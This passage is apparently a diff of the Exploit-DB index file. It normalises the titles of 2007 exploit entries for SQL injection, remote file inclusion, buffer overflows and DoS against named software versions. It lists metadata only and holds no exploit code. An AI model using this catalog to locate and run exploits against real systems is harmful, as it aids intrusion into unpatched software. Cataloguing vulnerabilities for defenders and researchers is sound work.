Exploit (Metasploit)",2007-02-19,"Jacopo Cervini",windows,remote,21 -3336,platforms/php/webapps/3336.txt,"Ultimate Fun Book 1.02 - (function.php) Remote File Include",2007-02-20,kezzap66345,php,webapps,0 +3336,platforms/php/webapps/3336.txt,"Ultimate Fun Book 1.02 - (function.php) Remote File Inclusion",2007-02-20,kezzap66345,php,webapps,0 3337,platforms/php/webapps/3337.php,"NukeSentinel 2.5.05 - (nsbypass.php) Blind SQL Injection Exploit",2007-02-20,DarkFig,php,webapps,0 3338,platforms/php/webapps/3338.php,"NukeSentinel 2.5.05 - (nukesentinel.php) File Disclosure Exploit",2007-02-20,DarkFig,php,webapps,0 -3339,platforms/asp/webapps/3339.txt,"Online Web Building 2.0 - (id) Remote SQL Injection",2007-02-20,"Mehmet Ince",asp,webapps,0 -3340,platforms/windows/remote/3340.html,"Mozilla Firefox <= 2.0.0.1 - (location.hostname) Cross-Domain",2007-02-20,"Michal Zalewski",windows,remote,0 +3339,platforms/asp/webapps/3339.txt,"Online Web Building 2.0 - (id) SQL Injection",2007-02-20,"Mehmet Ince",asp,webapps,0 +3340,platforms/windows/remote/3340.html,"Mozilla Firefox 2.0.0.1 - (location.hostname) Cross-Domain",2007-02-20,"Michal Zalewski",windows,remote,0 3341,platforms/windows/dos/3341.cpp,"TurboFTP 5.30 Build 572 - (newline/LIST) Multiple Remote DoS Exploit",2007-02-20,Marsu,windows,dos,0 3342,platforms/windows/local/3342.c,"News Rover 12.1 Rev 1 - Remote Stack Overflow Exploit",2007-02-20,Marsu,windows,local,0 -3343,platforms/windows/dos/3343.cpp,"FTP Voyager <= 14.0.0.3 - (CWD) Remote Stack Overflow Exploit PoC",2007-02-20,Marsu,windows,dos,0 -3344,platforms/php/webapps/3344.pl,"PHP-Nuke <= 8.0 Final (INSERT) Blind SQL Injection Exploit (mysql)",2007-02-20,krasza,php,webapps,0 -3345,platforms/php/webapps/3345.pl,"PHP-Nuke <= 8.0 Final (INSERT) Remote SQL Injection Exploit",2007-02-20,krasza,php,webapps,0 -3346,platforms/php/webapps/3346.pl,"PHP-Nuke <= 8.0 Final (HTTP Referers) Remote SQL Injection Exploit",2007-02-20,krasza,php,webapps,0 +3343,platforms/windows/dos/3343.cpp,"FTP Voyager 14.0.0.3 - (CWD) Remote Stack Overflow Exploit PoC",2007-02-20,Marsu,windows,dos,0 +3344,platforms/php/webapps/3344.pl,"PHP-Nuke 8.0 Final (INSERT) Blind SQL Injection Exploit (mysql)",2007-02-20,krasza,php,webapps,0 +3345,platforms/php/webapps/3345.pl,"PHP-Nuke 8.0 Final (INSERT) SQL Injection Exploit",2007-02-20,krasza,php,webapps,0 +3346,platforms/php/webapps/3346.pl,"PHP-Nuke 8.0 Final (HTTP Referers) SQL Injection Exploit",2007-02-20,krasza,php,webapps,0 3347,platforms/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 - (CPU consumption) Remote DoS Exploit",2007-02-20,Marsu,windows,dos,0 -3348,platforms/php/webapps/3348.txt,"SendStudio <= 2004.14 - (ROOTDIR) Remote File Inclusion",2007-02-20,K-159,php,webapps,0 +3348,platforms/php/webapps/3348.txt,"SendStudio 2004.14 - (ROOTDIR) Remote File Inclusion",2007-02-20,K-159,php,webapps,0 3349,platforms/windows/local/3349.c,"News Bin Pro 5.33 - (.NBI) Local Buffer Overflow Exploit",2007-02-21,Marsu,windows,local,0 3350,platforms/windows/dos/3350.html,"BrowseDialog Class - (ccrpbds6.dll) Multiple Methods DoS Exploit",2007-02-21,shinnai,windows,dos,0 -3351,platforms/php/webapps/3351.pl,"webSPELL <= 4.01.02 - (topic) Remote SQL Injection Exploit",2007-02-21,DNX,php,webapps,0 -3352,platforms/php/webapps/3352.php,"Connectix Boards <= 0.7 - (p_skin) Multiple Vulnerabilities",2007-02-21,DarkFig,php,webapps,0 -3353,platforms/php/webapps/3353.txt,"DBImageGallery 1.2.2 - (donsimg_base_path) RFI Vulnerabilities",2007-02-21,Denven,php,webapps,0 -3354,platforms/php/webapps/3354.txt,"DBGuestbook 1.1 - (dbs_base_path) Remote File Include Vulnerabilities",2007-02-21,Denven,php,webapps,0 +3351,platforms/php/webapps/3351.pl,"webSPELL 4.01.02 - (topic) SQL Injection Exploit",2007-02-21,DNX,php,webapps,0 +3352,platforms/php/webapps/3352.php,"Connectix Boards 0.7 - (p_skin) Multiple Vulnerabilities",2007-02-21,DarkFig,php,webapps,0 +3353,platforms/php/webapps/3353.txt,"DBImageGallery 1.2.2 - (donsimg_base_path) Remote File Inclusion",2007-02-21,Denven,php,webapps,0 +3354,platforms/php/webapps/3354.txt,"DBGuestbook 1.1 - (dbs_base_path) Remote File Inclusion Vulnerabilities",2007-02-21,Denven,php,webapps,0 3355,platforms/php/webapps/3355.php,"Nabopoll 1.2 - (result.php surv) Remote Blind SQL Injection Exploit",2007-02-21,s0cratex,php,webapps,0 -3356,platforms/linux/local/3356.sh,"Nortel SSL VPN Linux Client <= 6.0.3 - Local Privilege Escalation Exploit",2007-02-21,"Jon Hart",linux,local,0 +3356,platforms/linux/local/3356.sh,"Nortel SSL VPN Linux Client 6.0.3 - Local Privilege Escalation Exploit",2007-02-21,"Jon Hart",linux,local,0 3357,platforms/php/webapps/3357.txt,"DZCP (deV!L_z Clanportal) <= 1.4.5 - Remote File Disclosure",2007-02-21,Kiba,php,webapps,0 3358,platforms/multiple/remote/3358.pl,"Oracle 10g KUPW$WORKER.MAIN Grant/Revoke dba Permission Exploit",2007-02-22,bunker,multiple,remote,0 3359,platforms/multiple/remote/3359.pl,"Oracle 10g KUPV$FT.ATTACH_JOB Grant/Revoke dba Permission Exploit",2007-02-22,bunker,multiple,remote,0 -3360,platforms/php/webapps/3360.txt,"FlashGameScript 1.5.4 - (index.php func) Remote File Include",2007-02-22,JuMp-Er,php,webapps,0 -3361,platforms/php/webapps/3361.txt,"eFiction <= 3.1.1 - (path_to_smf) Remote File Include Vulnerabilities",2007-02-22,"ThE dE@Th",php,webapps,0 +3360,platforms/php/webapps/3360.txt,"FlashGameScript 1.5.4 - (index.php func) Remote File Inclusion",2007-02-22,JuMp-Er,php,webapps,0 +3361,platforms/php/webapps/3361.txt,"eFiction 3.1.1 - (path_to_smf) Remote File Inclusion Vulnerabilities",2007-02-22,"ThE dE@Th",php,webapps,0 3362,platforms/multiple/dos/3362.py,"Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit",2007-02-23,"Trirat Puttaraksa",multiple,dos,0 3363,platforms/multiple/remote/3363.pl,"Oracle 9i/10g DBMS_METADATA.GET_DDL SQL Injection Exploit",2007-02-23,bunker,multiple,remote,0 3364,platforms/windows/remote/3364.pl,"Oracle 9i/10g ACTIVATE_SUBSCRIPTION SQL Injection Exploit",2007-02-23,bunker,windows,remote,0 -3365,platforms/php/webapps/3365.txt,"FCRing <= 1.31 - (fcring.php s_fuss) Remote File Include",2007-02-23,kezzap66345,php,webapps,0 -3366,platforms/php/webapps/3366.txt,"Sinapis 2.2 Gastebuch (sinagb.php fuss) Remote File Include",2007-02-23,kezzap66345,php,webapps,0 -3367,platforms/php/webapps/3367.txt,"Sinapis Forum 2.2 - (sinapis.php fuss) Remote File Include",2007-02-23,kezzap66345,php,webapps,0 +3365,platforms/php/webapps/3365.txt,"FCRing 1.31 - (fcring.php s_fuss) Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 +3366,platforms/php/webapps/3366.txt,"Sinapis 2.2 Gastebuch (sinagb.php fuss) Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 +3367,platforms/php/webapps/3367.txt,"Sinapis Forum 2.2 - (sinapis.php fuss) Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 3369,platforms/windows/local/3369.pl,"News Rover 12.1 Rev 1 - Remote Stack Overflow Exploit (perl)",2007-02-24,"Umesh Wanve",windows,local,0 -3370,platforms/php/webapps/3370.pl,"Extreme phpBB 3.0.1 - (functions.php) Remote File Include Exploit",2007-02-24,"Mehmet Ince",php,webapps,0 +3370,platforms/php/webapps/3370.pl,"Extreme phpBB 3.0.1 - (functions.php) Remote File Inclusion Exploit",2007-02-24,"Mehmet Ince",php,webapps,0 3371,platforms/php/webapps/3371.php,"Coppermine Photo Gallery 1.3.x - Remote Blind SQL Injection Exploit",2007-02-24,s0cratex,php,webapps,0 -3372,platforms/php/webapps/3372.php,"CS-Gallery 2.0 - (index.php album) Remote File Include Exploit",2007-02-24,burncycle,php,webapps,0 -3373,platforms/php/webapps/3373.pl,"phpBB Module NoMoKeTos Rules 0.0.1 - Remote File Include Exploit",2007-02-24,bd0rk,php,webapps,0 -3374,platforms/php/webapps/3374.txt,"PHP-MIP 0.1 - (top.php laypath) Remote File Include",2007-02-25,GoLd_M,php,webapps,0 +3372,platforms/php/webapps/3372.php,"CS-Gallery 2.0 - (index.php album) Remote File Inclusion Exploit",2007-02-24,burncycle,php,webapps,0 +3373,platforms/php/webapps/3373.pl,"phpBB Module NoMoKeTos Rules 0.0.1 - Remote File Inclusion Exploit",2007-02-24,bd0rk,php,webapps,0 +3374,platforms/php/webapps/3374.txt,"PHP-MIP 0.1 - (top.php laypath) Remote File Inclusion",2007-02-25,GoLd_M,php,webapps,0 3375,platforms/multiple/remote/3375.pl,"Oracle 10g KUPW$WORKER.MAIN - SQL Injection Exploit (2)",2007-02-26,bunker,multiple,remote,0 3376,platforms/multiple/remote/3376.pl,"Oracle 10g KUPV$FT.ATTACH_JOB - SQL Injection Exploit (2)",2007-02-26,bunker,multiple,remote,0 3377,platforms/multiple/remote/3377.pl,"Oracle 9i/10g DBMS_METADATA.GET_DDL - SQL Injection Exploit (2)",2007-02-26,bunker,multiple,remote,0 3378,platforms/multiple/remote/3378.pl,"Oracle 9i/10g ACTIVATE_SUBSCRIPTION - SQL Injection Exploit (2)",2007-02-26,bunker,multiple,remote,0 -3379,platforms/php/webapps/3379.php,"STWC-Counter <= 3.4.0 - (downloadcounter.php) RFI Exploit",2007-02-26,burncycle,php,webapps,0 -3380,platforms/windows/remote/3380.txt,"Kiwi CatTools TFTP <= 3.2.8 - Remote Path Traversal",2007-02-27,"Sergey Gordeychik",windows,remote,0 -3381,platforms/windows/remote/3381.pl,"NetProxy <= 4.03 Web Filter Evasion / Bypass Logging Exploit",2007-02-27,"Craig Heffner",windows,remote,0 -3382,platforms/php/webapps/3382.txt,"Admin Phorum 3.3.1a - (del.php include_path) RFI",2007-02-27,GoLd_M,php,webapps,0 +3379,platforms/php/webapps/3379.php,"STWC-Counter 3.4.0 - (downloadcounter.php) Remote File Inclusion Exploit",2007-02-26,burncycle,php,webapps,0 +3380,platforms/windows/remote/3380.txt,"Kiwi CatTools TFTP 3.2.8 - Remote Path Traversal",2007-02-27,"Sergey Gordeychik",windows,remote,0 +3381,platforms/windows/remote/3381.pl,"NetProxy 4.03 Web Filter Evasion / Bypass Logging Exploit",2007-02-27,"Craig Heffner",windows,remote,0 +3382,platforms/php/webapps/3382.txt,"Admin Phorum 3.3.1a - (del.php include_path) Remote File Inclusion",2007-02-27,GoLd_M,php,webapps,0 3383,platforms/plan9/local/3383.c,"Plan 9 Kernel - (devenv.c OTRUNC/pwrite) Local Exploit",2007-02-28,"Don Bailey",plan9,local,0 3384,platforms/linux/local/3384.c,"Apache 1.3.33/1.3.34 (Ubuntu / Debian) - (CGI TTY) Local Root Exploit",2007-02-28,"Kristian Hermansen",linux,local,0 3385,platforms/windows/dos/3385.pl,"XM Easy Personal FTP Server 5.30 - (ABOR) Format String DoS Exploit",2007-02-28,"Umesh Wanve",windows,dos,0 3386,platforms/osx/local/3386.pl,"McAfee VirusScan for Mac (Virex) <= 7.7 - Local Root Exploit",2007-02-28,"Kevin Finisterre",osx,local,0 -3387,platforms/php/webapps/3387.php,"vBulletin <= 3.6.4 - (inlinemod.php postids) Remote SQL Injection Exploit",2007-02-28,rgod,php,webapps,0 -3388,platforms/windows/remote/3388.pl,"3Com TFTP Service <= 2.0.1 - (Long Transporting Mode) Exploit (Perl)",2007-02-28,"Umesh Wanve",windows,remote,69 -3389,platforms/linux/remote/3389.c,"madwifi <= 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow Exploit",2007-03-01,"Massimiliano Oldani",linux,remote,0 -3390,platforms/asp/webapps/3390.txt,"Angel Lms 7.1 - (default.asp id) Remote SQL Injection",2007-03-01,"Craig Heffner",asp,webapps,0 +3387,platforms/php/webapps/3387.php,"vBulletin 3.6.4 - (inlinemod.php postids) SQL Injection Exploit",2007-02-28,rgod,php,webapps,0 +3388,platforms/windows/remote/3388.pl,"3Com TFTP Service 2.0.1 - (Long Transporting Mode) Exploit (Perl)",2007-02-28,"Umesh Wanve",windows,remote,69 +3389,platforms/linux/remote/3389.c,"madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow Exploit",2007-03-01,"Massimiliano Oldani",linux,remote,0 +3390,platforms/asp/webapps/3390.txt,"Angel Lms 7.1 - (default.asp id) SQL Injection",2007-03-01,"Craig Heffner",asp,webapps,0 3391,platforms/windows/remote/3391.py,"Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit",2007-03-01,"Trirat Puttaraksa",windows,remote,0 3392,platforms/windows/dos/3392.html,"DivX Web Player 1.3.0 - (npdivx32.dll) Remote Denial of Service Exploit",2007-03-01,shinnai,windows,dos,0 -3393,platforms/php/webapps/3393.php,"phpMyFAQ <= 1.6.7 - Remote SQL Injection / Command Execution Exploit",2007-03-01,elgCrew,php,webapps,0 +3393,platforms/php/webapps/3393.php,"phpMyFAQ 1.6.7 - SQL Injection / Command Execution Exploit",2007-03-01,elgCrew,php,webapps,0 3394,platforms/multiple/dos/3394.php,"PHP 4 Userland ZVAL Reference Counter Overflow Exploit PoC",2007-03-01,"Stefan Esser",multiple,dos,0 3395,platforms/windows/remote/3395.c,"WebMod 0.48 - (Content-Length) Remote Buffer Overflow Exploit PoC",2007-03-01,cybermind,windows,remote,0 -3396,platforms/linux/dos/3396.php,"PHP <= 4.4.4 unserialize() ZVAL Reference Counter Overflow Exploit PoC",2007-03-02,"Stefan Esser",linux,dos,0 -3397,platforms/windows/remote/3397.pl,"MailEnable Pro/Ent <= 2.37 - (APPEND) Remote Buffer Overflow Exploit",2007-03-02,mu-b,windows,remote,143 +3396,platforms/linux/dos/3396.php,"PHP 4.4.4 unserialize() ZVAL Reference Counter Overflow Exploit PoC",2007-03-02,"Stefan Esser",linux,dos,0 +3397,platforms/windows/remote/3397.pl,"MailEnable Pro/Ent 2.37 - (APPEND) Remote Buffer Overflow Exploit",2007-03-02,mu-b,windows,remote,143 39567,platforms/php/webapps/39567.txt,"Monstra CMS 3.0.3 - Multiple Vulnerabilities",2016-03-16,"Sarim Kiani",php,webapps,80 -3398,platforms/php/webapps/3398.txt,"Mani Stats Reader <= 1.2 - (ipath) Remote File Include",2007-03-02,mozi,php,webapps,0 +3398,platforms/php/webapps/3398.txt,"Mani Stats Reader 1.2 - (ipath) Remote File Inclusion",2007-03-02,mozi,php,webapps,0 3399,platforms/windows/dos/3399.txt,"Netrek 2.12.0 - pmessage2() Remote Limited Format String Exploit",2007-03-02,"Luigi Auriemma",windows,dos,0 -3400,platforms/php/webapps/3400.pl,"webSPELL <= 4.01.02 - Multiple Remote SQL Injection Exploit",2007-03-02,DNX,php,webapps,0 -3402,platforms/php/webapps/3402.php,"webSPELL <= 4.01.02 - Remote PHP Code Execution Exploit",2007-03-03,DarkFig,php,webapps,0 +3400,platforms/php/webapps/3400.pl,"webSPELL 4.01.02 - Multiple SQL Injection Exploit",2007-03-02,DNX,php,webapps,0 +3402,platforms/php/webapps/3402.php,"webSPELL 4.01.02 - Remote PHP Code Execution Exploit",2007-03-03,DarkFig,php,webapps,0 3403,platforms/php/webapps/3403.php,"Rigter Portal System (RPS) 6.2 - Remote Blind SQL Injection Exploit",2007-03-04,s0cratex,php,webapps,0 3404,platforms/multiple/dos/3404.php,"PHP wddx_deserialize() String Append Crash Exploit",2007-03-04,"Stefan Esser",multiple,dos,0 3405,platforms/multiple/remote/3405.txt,"PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS",2007-03-04,"Stefan Esser",multiple,remote,0 -3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - (eintrag.php sqllog) Remote File Include Exploit",2007-03-04,bd0rk,php,webapps,0 -3407,platforms/multiple/dos/3407.c,"Asterisk <= 1.2.15 / 1.4.0 - pre-auth Remote Denial of Service Exploit",2007-03-04,fbffff,multiple,dos,0 -3408,platforms/php/webapps/3408.pl,"AJ Auction Pro - (subcat.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 -3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 - (view_profile.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 -3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - (postingdetails.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 -3411,platforms/php/webapps/3411.pl,"AJ Forum 1.0 - (topic_title.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 -3412,platforms/cgi/webapps/3412.txt,"RRDBrowse <= 1.6 - Remote Arbitrary File Disclosure",2007-03-04,"Sebastian Wolfgarten",cgi,webapps,0 +3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - (eintrag.php sqllog) Remote File Inclusion Exploit",2007-03-04,bd0rk,php,webapps,0 +3407,platforms/multiple/dos/3407.c,"Asterisk 1.2.15 / 1.4.0 - pre-auth Remote Denial of Service Exploit",2007-03-04,fbffff,multiple,dos,0 +3408,platforms/php/webapps/3408.pl,"AJ Auction Pro - (subcat.php) SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 +3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 - (view_profile.php) SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 +3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - (postingdetails.php) SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 +3411,platforms/php/webapps/3411.pl,"AJ Forum 1.0 - (topic_title.php) SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 +3412,platforms/cgi/webapps/3412.txt,"RRDBrowse 1.6 - Remote Arbitrary File Disclosure",2007-03-04,"Sebastian Wolfgarten",cgi,webapps,0 3413,platforms/multiple/local/3413.php,"PHP < 4.4.5 - / 5.2.1 - php_binary Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 3414,platforms/multiple/local/3414.php,"PHP < 4.4.5 - / 5.2.1 - WDDX Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 3415,platforms/linux/dos/3415.html,"Konqueror 3.5.5 - (JavaScript Read of FTP Iframe) DoS Exploit",2007-03-05,mark,linux,dos,0 -3416,platforms/php/webapps/3416.pl,"Links Management Application 1.0 - (lcnt) Remote SQL Injection Exploit",2007-03-05,ajann,php,webapps,0 -3417,platforms/windows/local/3417.php,"PHP <= 4.4.6 - mssql_[p]connect() Local Buffer Overflow Exploit",2007-03-05,rgod,windows,local,0 -3418,platforms/windows/dos/3418.pl,"Mercury/32 Mail Server <= 4.01b (check) Buffer Overflow Exploit PoC",2007-03-06,mu-b,windows,dos,0 +3416,platforms/php/webapps/3416.pl,"Links Management Application 1.0 - (lcnt) SQL Injection Exploit",2007-03-05,ajann,php,webapps,0 +3417,platforms/windows/local/3417.php,"PHP 4.4.6 - mssql_[p]connect() Local Buffer Overflow Exploit",2007-03-05,rgod,windows,local,0 +3418,platforms/windows/dos/3418.pl,"Mercury/32 Mail Server 4.01b (check) Buffer Overflow Exploit PoC",2007-03-06,mu-b,windows,dos,0 3419,platforms/windows/dos/3419.txt,"Microsoft Windows - (.doc) Malformed Pointers Denial of Service Exploit",2007-03-06,Marsu,windows,dos,0 -3420,platforms/windows/remote/3420.html,"WinZip <= 10.0.7245 - FileView ActiveX Buffer Overflow Exploit (2)",2007-03-06,prdelka,windows,remote,0 +3420,platforms/windows/remote/3420.html,"WinZip 10.0.7245 - FileView ActiveX Buffer Overflow Exploit (2)",2007-03-06,prdelka,windows,remote,0 3421,platforms/windows/dos/3421.html,"Macromedia 10.1.4.20 - SwDir.dll Internet Explorer Stack Overflow DoS",2007-03-07,shinnai,windows,dos,0 -3422,platforms/windows/remote/3422.pl,"Winamp <= 5.12 - (.pls) Remote Buffer Overflow Exploit (Perl)",2007-03-07,"Umesh Wanve",windows,remote,0 -3423,platforms/php/webapps/3423.txt,"PHP-Nuke Module PostGuestbook 0.6.1 - (tpl_pgb_moddir) RFI",2007-03-07,GoLd_M,php,webapps,0 -3424,platforms/multiple/local/3424.php,"PHP <= 5.2.1 substr_compare() Information Leak Exploit",2007-03-07,"Stefan Esser",multiple,local,0 -3425,platforms/multiple/remote/3425.txt,"mod_security <= 2.1.0 - (ASCIIZ byte) POST Rules Bypass",2007-03-07,"Stefan Esser",multiple,remote,0 +3422,platforms/windows/remote/3422.pl,"Winamp 5.12 - (.pls) Remote Buffer Overflow Exploit (Perl)",2007-03-07,"Umesh Wanve",windows,remote,0 +3423,platforms/php/webapps/3423.txt,"PHP-Nuke Module PostGuestbook 0.6.1 - (tpl_pgb_moddir) Remote File Inclusion",2007-03-07,GoLd_M,php,webapps,0 +3424,platforms/multiple/local/3424.php,"PHP 5.2.1 substr_compare() Information Leak Exploit",2007-03-07,"Stefan Esser",multiple,local,0 +3425,platforms/multiple/remote/3425.txt,"mod_security 2.1.0 - (ASCIIZ byte) POST Rules Bypass",2007-03-07,"Stefan Esser",multiple,remote,0 3426,platforms/linux/local/3426.php,"PHP < 4.4.5 / 5.2.1 - (shmop Functions) Local Code Execution Exploit",2007-03-07,"Stefan Esser",linux,local,0 3427,platforms/linux/local/3427.php,"PHP < 4.4.5 / 5.2.1 - (shmop) SSL RSA Private-Key Disclosure Exploit",2007-03-07,"Stefan Esser",linux,local,0 3428,platforms/php/webapps/3428.txt,"Flat Chat 2.0 - (include online.txt) Remote Code Execution",2007-03-07,Dj7xpl,php,webapps,0 @@ -3103,55 +3103,55 @@ id,file,description,date,author,platform,type,port 3434,platforms/multiple/dos/3434.c,"Snort 2.6.1.1/2.6.1.2/2.7.0 - (fragementation) Remote DoS Exploit",2007-03-08,Antimatt3r,multiple,dos,0 3435,platforms/php/webapps/3435.txt,"netForo! 0.1 - (down.php file_to_download) Remote File Disclosure",2007-03-08,GoLd_M,php,webapps,0 3436,platforms/php/webapps/3436.txt,"WEBO (Web Organizer) <= 1.0 - (baseDir) Remote File Inclusion",2007-03-08,K-159,php,webapps,0 -3437,platforms/asp/webapps/3437.txt,"GaziYapBoz Game Portal - (kategori.asp) Remote SQL Injection",2007-03-08,CyberGhost,asp,webapps,0 -3438,platforms/php/webapps/3438.txt,"Magic CMS 4.2.747 - (mysave.php) Remote File Include",2007-03-08,DNX,php,webapps,0 +3437,platforms/asp/webapps/3437.txt,"GaziYapBoz Game Portal - (kategori.asp) SQL Injection",2007-03-08,CyberGhost,asp,webapps,0 +3438,platforms/php/webapps/3438.txt,"Magic CMS 4.2.747 - (mysave.php) Remote File Inclusion",2007-03-08,DNX,php,webapps,0 3439,platforms/windows/local/3439.php,"PHP 4.4.6 snmpget() object id Local Buffer Overflow Exploit PoC",2007-03-09,rgod,windows,local,0 -3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP <= 1.8.3 - zip:// URL Wrapper BoF Exploit",2007-03-09,"Stefan Esser",linux,local,0 +3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - zip:// URL Wrapper BoF Exploit",2007-03-09,"Stefan Esser",linux,local,0 3441,platforms/linux/dos/3441.c,"Linux Omnikey Cardman 4040 Driver - Local Buffer Overflow Exploit PoC",2007-03-09,"Daniel Roethlisberger",linux,dos,0 3442,platforms/multiple/local/3442.php,"PHP 4.4.6 cpdf_open() Local Source Code Discslosure PoC",2007-03-09,rgod,multiple,local,0 -3443,platforms/php/webapps/3443.txt,"PMB Services <= 3.0.13 - Multiple Remote File Inclusion",2007-03-09,K-159,php,webapps,0 +3443,platforms/php/webapps/3443.txt,"PMB Services 3.0.13 - Multiple Remote File Inclusion",2007-03-09,K-159,php,webapps,0 3444,platforms/windows/dos/3444.pl,"Microsoft Internet Explorer - (FTP Server Response) DoS Exploit (MS07-016)",2007-03-09,"Mathew Rowley",windows,dos,0 3447,platforms/php/webapps/3447.txt,"Grayscale Blog 0.8.0 - (Security Bypass/SQL/XSS) Multiple Remote Vulnerabilities",2007-03-09,Omni,php,webapps,0 -3448,platforms/php/webapps/3448.txt,"work system e-commerce <= 3.0.5 - Remote File Inclusion",2007-03-10,"Rodrigo Duarte",php,webapps,0 -3449,platforms/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 - (index.php ID) Remote SQL Injection",2007-03-10,WiLdBoY,php,webapps,0 -3450,platforms/php/webapps/3450.php,"NukeSentinel <= 2.5.06 - Remote SQL Injection Exploit",2007-03-10,DarkFig,php,webapps,0 +3448,platforms/php/webapps/3448.txt,"work system e-commerce 3.0.5 - Remote File Inclusion",2007-03-10,"Rodrigo Duarte",php,webapps,0 +3449,platforms/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 - (index.php ID) SQL Injection",2007-03-10,WiLdBoY,php,webapps,0 +3450,platforms/php/webapps/3450.php,"NukeSentinel 2.5.06 - SQL Injection Exploit",2007-03-10,DarkFig,php,webapps,0 3451,platforms/windows/local/3451.c,"Oracle 10g - (PROCESS_DUP_HANDLE) Local Privilege Elevation (Win32)",2007-03-10,"Cesar Cerrudo",windows,local,0 -3452,platforms/multiple/remote/3452.php,"PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit",2007-03-10,"Stefan Esser",multiple,remote,0 +3452,platforms/multiple/remote/3452.php,"PHP 5.2.0 ext/filter FDF Post Filter Bypass Exploit",2007-03-10,"Stefan Esser",multiple,remote,0 3453,platforms/windows/dos/3453.py,"Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption",2007-03-10,h07,windows,dos,0 -3454,platforms/php/webapps/3454.pl,"PostNuke Module phgstats 0.5 - (phgdir) Remote File Include Exploit",2007-03-11,bd0rk,php,webapps,0 -3455,platforms/php/webapps/3455.htm,"JobSitePro 1.0 - (search.php) Remote SQL Injection Exploit",2007-03-11,ajann,php,webapps,0 -3456,platforms/php/webapps/3456.pl,"Top Auction 1.0 - (viewcat.php) Remote SQL Injection Exploit",2007-03-11,ajann,php,webapps,0 -3457,platforms/php/webapps/3457.pl,"SonicMailer Pro <= 3.2.3 - (index.php) Remote SQL Injection Exploit",2007-03-11,ajann,php,webapps,0 -3458,platforms/php/webapps/3458.txt,"AssetMan <= 2.4a - (download_pdf.php) Remote File Disclosure",2007-03-11,"BorN To K!LL",php,webapps,0 -3459,platforms/php/webapps/3459.txt,"cPanel <= 10.9.x - (fantastico) Local File Inclusion Vulnerabilities",2007-03-11,"cyb3rt & 020",php,webapps,0 +3454,platforms/php/webapps/3454.pl,"PostNuke Module phgstats 0.5 - (phgdir) Remote File Inclusion Exploit",2007-03-11,bd0rk,php,webapps,0 +3455,platforms/php/webapps/3455.htm,"JobSitePro 1.0 - (search.php) SQL Injection Exploit",2007-03-11,ajann,php,webapps,0 +3456,platforms/php/webapps/3456.pl,"Top Auction 1.0 - (viewcat.php) SQL Injection Exploit",2007-03-11,ajann,php,webapps,0 +3457,platforms/php/webapps/3457.pl,"SonicMailer Pro 3.2.3 - (index.php) SQL Injection Exploit",2007-03-11,ajann,php,webapps,0 +3458,platforms/php/webapps/3458.txt,"AssetMan 2.4a - (download_pdf.php) Remote File Disclosure",2007-03-11,"BorN To K!LL",php,webapps,0 +3459,platforms/php/webapps/3459.txt,"cPanel 10.9.x - (fantastico) Local File Inclusion Vulnerabilities",2007-03-11,"cyb3rt & 020",php,webapps,0 3460,platforms/osx/local/3460.php,"PHP 5.2.0 - ext/filter Space Trimming Buffer Underflow Exploit (MacOSX)",2007-03-12,"Stefan Esser",osx,local,0 3461,platforms/windows/dos/3461.pl,"TFTP Server 1.3 - Remote Buffer Overflow Denial of Service Exploit",2007-03-12,"Umesh Wanve",windows,dos,0 3462,platforms/windows/remote/3462.cpp,"NewsReactor 20070220 Article Grabbing Remote BoF Exploit (1)",2007-03-12,Marsu,windows,remote,0 3463,platforms/windows/remote/3463.cpp,"NewsReactor 20070220 Article Grabbing Remote BoF Exploit (2)",2007-03-12,Marsu,windows,remote,0 3464,platforms/windows/dos/3464.cpp,"News Bin Pro 4.32 Article Grabbing Remote Unicode BoF Exploit",2007-03-12,Marsu,windows,dos,0 3465,platforms/php/webapps/3465.txt,"OES (Open Educational System) 0.1beta - Remote File Inclusion",2007-03-12,K-159,php,webapps,0 -3466,platforms/asp/webapps/3466.txt,"BP Blog 7.0 - (default.asp layout) Remote SQL Injection",2007-03-12,BeyazKurt,asp,webapps,0 +3466,platforms/asp/webapps/3466.txt,"BP Blog 7.0 - (default.asp layout) SQL Injection",2007-03-12,BeyazKurt,asp,webapps,0 3467,platforms/php/webapps/3467.txt,"GestArt beta 1 - (aide.php aide) Remote File Inclusion",2007-03-13,Dj7xpl,php,webapps,0 -3468,platforms/php/webapps/3468.txt,"MySQL Commander <= 2.7 - (home) Remote File Inclusion",2007-03-13,K-159,php,webapps,0 +3468,platforms/php/webapps/3468.txt,"MySQL Commander 2.7 - (home) Remote File Inclusion",2007-03-13,K-159,php,webapps,0 3469,platforms/asp/webapps/3469.txt,"X-ice News System 1.0 - (devami.asp id) SQL Injection",2007-03-13,CyberGhost,asp,webapps,0 3470,platforms/asp/webapps/3470.htm,"JGBBS 3.0beta1 - (search.asp author) SQL Injection Exploit",2007-03-13,WiLdBoY,asp,webapps,0 